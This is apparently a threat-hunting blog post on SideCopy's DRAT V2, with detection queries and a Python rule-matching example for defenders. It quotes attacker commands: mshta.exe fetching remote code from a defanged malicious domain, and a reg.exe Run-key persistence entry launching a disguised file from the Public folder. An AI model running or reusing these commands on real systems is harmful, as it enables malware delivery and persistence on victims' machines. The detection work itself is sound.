177. Hunting for SideCopy's DRAT V2
Hello everyone!
Let's look at another example of leveraging the ClickFix technique. This time it's SideCopy, a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT, so let's look at some detection and hunting opportunities.
First of all, the adversary abuses mshta.exe:
C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php
It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers:
event_type: "processcreatewin"
AND
proc_file_name: "mshta.exe"
AND
cmdline: ("http" OR "https")
Next, it abuses reg.exe to establish persistence for DRAT:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf"
Here we can hunt for Run key entries pointing to files located under %PUBLIC%, for example:
event_type: "processcreatewin"
AND
proc_file_name: "reg.exe"
AND
cmdline: ("add" AND "run" AND "public")
Finally, the adversary executes cmd.exe to run a masqueraded malicious file from %PUBLIC%, and this is another hunting opportunity:
event_type: "processcreatewin"
AND
proc_file_name: "cmd.exe"
AND
cmdline: ("start" AND "public")
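To show how the three hunting queries above behave as detection logic, here is an added Python example (not part of the original post) that runs them over a handful of constructed process-creation events; field names follow the queries, the sample URL uses a placeholder domain, and the benign events are invented to show what the rules do not fire on.

```python
# Constructed sample process-creation events (not real telemetry). Field names
# mirror the hunting queries: event_type, proc_file_name, cmdline.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "mshta.exe",
     "cmdline": r"mshta.exe https://example.invalid/admin/assets/css/default/index.php"},
    {"event_type": "processcreatewin", "proc_file_name": "reg.exe",
     "cmdline": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" '
                r'/t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf"'},
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": r"cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf"},
    # Benign noise: a local HTA file and a Run key entry under Program Files.
    {"event_type": "processcreatewin", "proc_file_name": "mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\dashboard.hta"},
    {"event_type": "processcreatewin", "proc_file_name": "reg.exe",
     "cmdline": r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /V Updater /d "C:\Program Files\Vendor\upd.exe"'},
]

# One entry per hunting query: (rule name, image name, terms that must ALL
# appear in cmdline). Matching is case-insensitive substring, like the
# AND clauses in the queries; "http" also covers "https".
RULES = [
    ("mshta_remote_url", "mshta.exe", ["http"]),
    ("reg_run_key_public", "reg.exe", ["add", "run", "public"]),
    ("cmd_start_public", "cmd.exe", ["start", "public"]),
]


def match_rules(event, rules=RULES):
    """Return the names of every rule that fires on a single event."""
    if event.get("event_type") != "processcreatewin":
        return []
    image = event.get("proc_file_name", "").lower()
    cmd = event.get("cmdline", "").lower()
    return [name for name, proc, terms in rules
            if image == proc and all(term in cmd for term in terms)]


def hunt(events, rules=RULES):
    """Run all rules over a list of events; returns (event_index, rule_name) pairs."""
    return [(i, r) for i, ev in enumerate(events) for r in match_rules(ev, rules)]


if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```

The cmd.exe rule in particular will need baselining against legitimate "start" usage in your environment before it is promoted from a hunt to an alert.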
See you tomorrow!